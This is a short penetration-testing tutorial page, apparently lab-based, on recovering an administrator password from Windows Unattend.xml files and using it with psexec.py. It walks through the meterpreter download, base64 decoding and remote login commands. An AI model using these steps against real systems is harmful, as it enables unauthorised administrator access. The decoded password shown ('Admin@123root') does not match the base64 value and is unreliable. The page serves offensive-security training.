Credentials Dumping
Passwords Configuration Files
Windows configuration files can contain stored passwords, e.g.
in the Unattended Windows Setup utility, used to mass deploy Windows on systems.
The configuration file can contain specific configurations and user account credentials
An attacker can find the configuration file left on the target after installation
The utility typically utilizes those files:
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Autounattend.xml
The stored passwords might be encoded in
base64
(easily decodable).
#Exploitation
After getting a meterpreter session or shell session follow the follwing technique:-
Manually search for the
unattend.xml
file, it should be insideC:\\Windows\\Panther
cd C:\\Windows\\Panther
dir
download unattend.xml

In a new terminal tab
cat unattend.xml

Get Access
administrator
user configured base64 password isQWRtaW5AMTIz
Save it to a new file
Decode it using the
base64
tool
nano password.txt
# paste the password, save and exit the file
base64 -d password.txt
Admin@123root

Test the
administrator
:Admin@123root
credentials with thepsexec
tool
psexec.py administrator@10.4.19.9
You have gained access to the administrator account
Last updated